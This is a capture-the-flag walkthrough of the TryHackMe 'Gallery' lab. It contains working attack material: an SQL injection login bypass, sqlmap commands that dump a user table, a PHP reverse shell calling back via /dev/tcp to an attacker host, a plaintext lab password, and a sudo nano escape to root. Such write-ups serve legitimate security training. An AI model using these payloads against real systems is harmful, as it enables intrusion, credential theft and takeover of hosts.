Gallery

Room Link: https://tryhackme.com/room/gallery666

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

No other ports found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

TCP/8080 - HTTP

Kali

gobuster dir -u http://$VICTIM:8080 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt --wildcard

TCP/80 - HTTP

SQL Injection

SQL injection worked on username field

Username: 1' or '1'='1'-- -
Password: anything

We found two databases

Kali

sudo sqlmap -r request.req --dbs

Get tables

Kali

sudo sqlmap -r request.req --current-db gallery_db --tables

Get fields for table users

Kali

sudo sqlmap -r request.req --current-db gallery_db --tables -T users --columns

Get values of the username and password fields. I couldn't crack the hash.

Kali

sudo sqlmap -r request.req --current-db gallery_db --tables -T users  -C username,password --dump

Initial Shell

I was able to upload a php reverse shell instead of an image

Kali

nc -lvnp 443

revshell.php code

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/$KALI/443 0>&1'");
?>

Get autocomplete

python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

We found a list of passwords from mike in a file called accounts and another password in history

Victim

su mike
Password: b3stpassw0rdbr0xx

Privilege Escalation

Exploit: https://gtfobins.github.io/gtfobins/nano/

mike is able to run a script with NOPASSWD, looking at the script it, there are a few options to select. One option is to run nano which we can use to get sudo. I also noticed my terminal would not open nano so I exported xterm

Victim

sudo -l
export TERM="xterm"

Victim

sudo /bin/bash /opt/rootkit.sh
^R^X
reset; sh 1>&0 2>&0